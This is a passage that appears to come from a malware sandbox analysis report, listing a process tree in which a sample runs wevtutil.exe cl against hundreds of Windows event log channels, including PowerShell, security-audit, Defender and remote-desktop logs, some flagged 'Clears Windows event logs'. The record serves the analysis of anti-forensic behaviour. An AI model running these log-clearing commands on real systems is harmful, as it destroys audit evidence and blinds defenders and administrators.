        wevtutil.exe cl "Microsoft-Windows-PersistentMemory-PmemDisk/Operational"
        7⤵
        
        PID:5404
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PersistentMemory-ScmBus/Analytic"
        7⤵
        
        PID:1556
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PersistentMemory-ScmBus/Certification"
        7⤵
        
        PID:2872
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PersistentMemory-ScmBus/Diagnose"
        7⤵
        
        PID:1796
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PersistentMemory-ScmBus/Operational"
        7⤵
        
        PID:3708
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PhotoAcq/Analytic"
        7⤵
        
        PID:3340
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PlayToManager/Analytic"
        7⤵
        
        PID:1232
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Policy/Analytic"
        7⤵
        
        PID:3600
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Policy/Operational"
        7⤵
        
        PID:5016
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
        7⤵
        
        PID:1640
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
        7⤵
        
        PID:3324
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Power-Meter-Polling/Diagnostic"
        7⤵
        
        PID:3372
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"
        7⤵
        Power Settings
        
        PID:1416
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"
        7⤵
        
        PID:3292
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
        7⤵
        
        PID:4888
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Analytic"
        7⤵
        
        PID:520
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Debug"
        7⤵
        Clears Windows event logs
        
        PID:4404
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Operational"
        7⤵
        
        PID:5624
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerShell/Admin"
        7⤵
        
        PID:5620
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"
        7⤵
        
        PID:4540
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerShell/Debug"
        7⤵
        
        PID:5668
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"
        7⤵
        
        PID:1496
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"
        7⤵
        
        PID:5660
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PrintBRM/Admin"
        7⤵
        
        PID:4836
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PrintService-USBMon/Debug"
        7⤵
        
        PID:3632
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"
        7⤵
        
        PID:5804
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PrintService/Debug"
        7⤵
        
        PID:5812
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PrintService/Operational"
        7⤵
        
        PID:5896
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Privacy-Auditing/Operational"
        7⤵
        Clears Windows event logs
        
        PID:524
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ProcessStateManager/Diagnostic"
        7⤵
        
        PID:3712
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Analytic"
        7⤵
        
        PID:5840
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/CompatAfterUpgrade"
        7⤵
        
        PID:5956
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Provisioning-Diagnostics-Provider/Admin"
        7⤵
        
        PID:1248
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Provisioning-Diagnostics-Provider/AutoPilot"
        7⤵
        
        PID:5836
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Provisioning-Diagnostics-Provider/Debug"
        7⤵
        
        PID:5992
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Provisioning-Diagnostics-Provider/ManagementService"
        7⤵
        
        PID:5912
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Proximity-Common/Diagnostic"
        7⤵
        
        PID:5928
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Proximity-Common/Informational"
        7⤵
        
        PID:284
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Proximity-Common/Performance"
        7⤵
        
        PID:5944
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PushNotification-Developer/Debug"
        7⤵
        
        PID:316
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PushNotification-InProc/Debug"
        7⤵
        
        PID:2148
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PushNotification-Platform/Admin"
        7⤵
        
        PID:440
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PushNotification-Platform/Debug"
        7⤵
        
        PID:5920
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PushNotification-Platform/Operational"
        7⤵
        
        PID:6060
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"
        7⤵
        
        PID:6096
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"
        7⤵
        
        PID:6112
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"
        7⤵
        
        PID:3528
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RPC/Debug"
        7⤵
        
        PID:6020
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"
        7⤵
        
        PID:3820
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RRAS/Debug"
        7⤵
        
        PID:4372
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RRAS/Operational"
        7⤵
        Clears Windows event logs
        
        PID:2556
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RadioManager/Analytic"
        7⤵
        
        PID:1280
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Ras-NdisWanPacketCapture/Diagnostic"
        7⤵
        Clears Windows event logs
        
        PID:3096
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RasAgileVpn/Debug"
        7⤵
        
        PID:4764
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RasAgileVpn/Operational"
        7⤵
        
        PID:896
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ReFS/Operational"
        7⤵
        
        PID:5036
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"
        7⤵
        
        PID:3660
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"
        7⤵
        
        PID:5064
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"
        7⤵
        
        PID:5604
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"
        7⤵
        
        PID:1704
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Regsvr32/Operational"
        7⤵
        
        PID:5648
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
        7⤵
        
        PID:5696
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Operational"
        7⤵
        Clears Windows event logs
        
        PID:5672
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"
        7⤵
        
        PID:5676
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"
        7⤵
        
        PID:2388
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"
        7⤵
        
        PID:5152
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
        7⤵
        
        PID:5180
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Debug"
        7⤵
        
        PID:652
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
        7⤵
        
        PID:4964
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RemoteFX-Synth3dvsc/Admin"
        7⤵
        
        PID:5144
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RemoteFX-VM-Kernel-Mode-Transport/Debug"
        7⤵
        
        PID:5408
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RemoteFX-VM-User-Mode-Transport/Debug"
        7⤵
        
        PID:2656
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-SessionServices/Operational"
        7⤵
        
        PID:5192
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Remotefs-Rdbss/Diagnostic"
        7⤵
        
        PID:5200
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Remotefs-Rdbss/Operational"
        7⤵
        
        PID:6040
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ResetEng-Trace/Diagnostic"
        7⤵
        
        PID:6056
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
        7⤵
        
        PID:5084
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
        7⤵
        
        PID:1776
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"
        7⤵
        
        PID:1136
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"
        7⤵
        Clears Windows event logs
        
        PID:4480
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RetailDemo/Admin"
        7⤵
        Clears Windows event logs
        
        PID:728
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RetailDemo/Operational"
        7⤵
        
        PID:4616
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Runtime-Graphics/Analytic"
        7⤵
        
        PID:3568
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Runtime-Networking-BackgroundTransfer/Tracing"
        7⤵
        
        PID:1820
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Runtime-Networking/Tracing"
        7⤵
        
        PID:764
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Runtime-Web-Http/Tracing"
        7⤵
        
        PID:3844
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Runtime-WebAPI/Tracing"
        7⤵
        
        PID:1464
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Runtime-Windows-Media/WinRTAdaptiveMediaSource"
        7⤵
        
        PID:5240
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Runtime-Windows-Media/WinRTCaptureEngine"
        7⤵
        Clears Windows event logs
        
        PID:5256
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Runtime-Windows-Media/WinRTMediaStreamSource"
        7⤵
        
        PID:5272
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Runtime-Windows-Media/WinRTTranscode"
        7⤵
        
        PID:5260
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Runtime/CreateInstance"
        7⤵
        
        PID:5332
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Runtime/Error"
        7⤵
        
        PID:4496
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SENSE/Operational"
        7⤵
        
        PID:5312
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBClient/Analytic"
        7⤵
        
        PID:5340
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBClient/HelperClassDiagnostic"
        7⤵
        
        PID:3944
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBClient/ObjectStateDiagnostic"
        7⤵
        
        PID:4820
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBClient/Operational"
        7⤵
        
        PID:4152
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBDirect/Admin"
        7⤵
        
        PID:4052
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBDirect/Debug"
        7⤵
        
        PID:4976
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBDirect/Netmon"
        7⤵
        
        PID:4864
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBServer/Analytic"
        7⤵
        
        PID:2756
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBServer/Audit"
        7⤵
        
        PID:1620
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBServer/Connectivity"
        7⤵
        
        PID:2220
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBServer/Diagnostic"
        7⤵
        
        PID:4676
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBServer/Operational"
        7⤵
        
        PID:1488
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBServer/Performance"
        7⤵
        
        PID:2200
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBServer/Security"
        7⤵
        
        PID:3916
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBWitnessClient/Admin"
        7⤵
        
        PID:3164
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBWitnessClient/Informational"
        7⤵
        
        PID:3812
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SPB-ClassExtension/Analytic"
        7⤵
        
        PID:912
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SPB-HIDI2C/Analytic"
        7⤵
        
        PID:3408
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Schannel-Events/Perf"
        7⤵
        
        PID:3028
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Sdbus/Analytic"
        7⤵
        
        PID:3764
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Sdbus/Debug"
        7⤵
        
        PID:1264
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Sdstor/Analytic"
        7⤵
        
        PID:2416
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"
        7⤵
        
        PID:980
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
        7⤵
        
        PID:5112
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SearchUI/Diagnostic"
        7⤵
        
        PID:2108
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SearchUI/Operational"
        7⤵
        Clears Windows event logs
        
        PID:4828
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-Adminless/Operational"
        7⤵
        Clears Windows event logs
        
        PID:5524
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
        7⤵
        
        PID:5540
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
        7⤵
        
        PID:5536
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-EnterpriseData-FileRevocationManager/Operational"
        7⤵
        
        PID:5556
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-ExchangeActiveSyncProvisioning/Operational"
        7⤵
        
        PID:5504
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-ExchangeActiveSyncProvisioning/Performance"
        7⤵
        
        PID:5508
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"
        7⤵
        
        PID:3776
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-IdentityStore/Performance"
        7⤵
        
        PID:2032
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-LessPrivilegedAppContainer/Operational"
        7⤵
        Clears Windows event logs
        
        PID:4880
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-Mitigations/KernelMode"
        7⤵
        
        PID:2888
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-Mitigations/UserMode"
        7⤵
        
        PID:2304
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-Netlogon/Operational"
        7⤵
        
        PID:5104
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-SPP-UX-GC/Analytic"
        7⤵
        
        PID:3480
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-SPP-UX-GenuineCenter-Logging/Operational"
        7⤵
        
        PID:4184
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-SPP-UX-Notifications/ActionCenter"
        7⤵
        
        PID:2580
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-SPP-UX/Analytic"
        7⤵
        
        PID:2708
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"
        7⤵
        
        PID:5728
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-UserConsentVerifier/Audit"
        7⤵
        
        PID:4604
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-Vault/Performance"
        7⤵
        
        PID:3392
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SecurityMitigationsBroker/Admin"
        7⤵
        
        PID:5372
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SecurityMitigationsBroker/Operational"
        7⤵
        
        PID:5432
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SecurityMitigationsBroker/Perf"
        7⤵
        
        PID:5380
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SendTo/Diagnostic"
        7⤵
        
        PID:5444
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Sens/Debug"
        7⤵
        
        PID:832
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SenseIR/Operational"
        7⤵
        
        PID:2612
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Sensors/Debug"
        7⤵
        
        PID:4592
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Sensors/Performance"
        7⤵
        
        PID:4508
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Serial-ClassExtension-V2/Analytic"
        7⤵
        Clears Windows event logs
        
        PID:3772
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Serial-ClassExtension/Analytic"
        7⤵
        
        PID:2452
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"
        7⤵
        
        PID:4968
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"
        7⤵
        
        PID:4568
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"
        7⤵
        
        PID:3768
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Servicing/Debug"
        7⤵
        
        PID:3920
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SettingSync-Azure/Debug"
        7⤵
        
        PID:5548
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SettingSync-Azure/Operational"
        7⤵
        
        PID:1124
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SettingSync-OneDrive/Analytic"
        7⤵
        
        PID:5396
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SettingSync-OneDrive/Debug"
        7⤵
        
        PID:5640
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SettingSync-OneDrive/Operational"
        7⤵
        
        PID:1612
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SettingSync/Analytic"
        7⤵
        
        PID:3220
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SettingSync/Debug"
        7⤵
        
        PID:4876
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SettingSync/Operational"
        7⤵
        
        PID:1212
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SettingSync/VerboseDebug"
        7⤵
        Clears Windows event logs
        
        PID:2068
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Setup/Analytic"
        7⤵
        
        PID:5704
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"
        7⤵
        
        PID:5820
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SetupPlatform/Analytic"
        7⤵
        
        PID:5732
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"
        7⤵
        Clears Windows event logs
        
        PID:5700
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"
        7⤵
        
        PID:5760
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
        7⤵
        
        PID:5816
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AppWizCpl/Diagnostic"
        7⤵
        
        PID:5780
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
        7⤵
        
        PID:5896
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
        7⤵
        
        PID:5940
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
        7⤵
        Clears Windows event logs
        
        PID:5884
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredentialProviderUser/Diagnostic"
        7⤵
        
        PID:1220
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
        7⤵
        
        PID:5844
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-LogonUI/Diagnostic"
        7⤵
        
        PID:4708
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
        7⤵
        
        PID:5836
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-ConnectedAccountState/ActionCenter"
        7⤵
        
        PID:5924
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-Core/ActionCenter"
        7⤵
        
        PID:5936
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-Core/AppDefaults"
        7⤵
        
        PID:5852
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"
        7⤵
        
        PID:5932
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-Core/LogonTasksChannel"
        7⤵
        
        PID:2736
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-Core/Operational"
        7⤵
        
        PID:292
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
        7⤵
        
        PID:1956
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-LockScreenContent/Diagnostic"
        7⤵
        
        PID:5100
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-OpenWith/Diagnostic"
        7⤵
        
        PID:6028
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"
        7⤵
        
        PID:6000
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
        7⤵
        
        PID:6096
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ShellCommon-StartLayoutPopulation/Diagnostic"
        7⤵
        
        PID:3572
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ShellCommon-StartLayoutPopulation/Operational"
        7⤵
        
        PID:3520
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"
        7⤵
        
        PID:6116
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SleepStudy/Diagnostic"
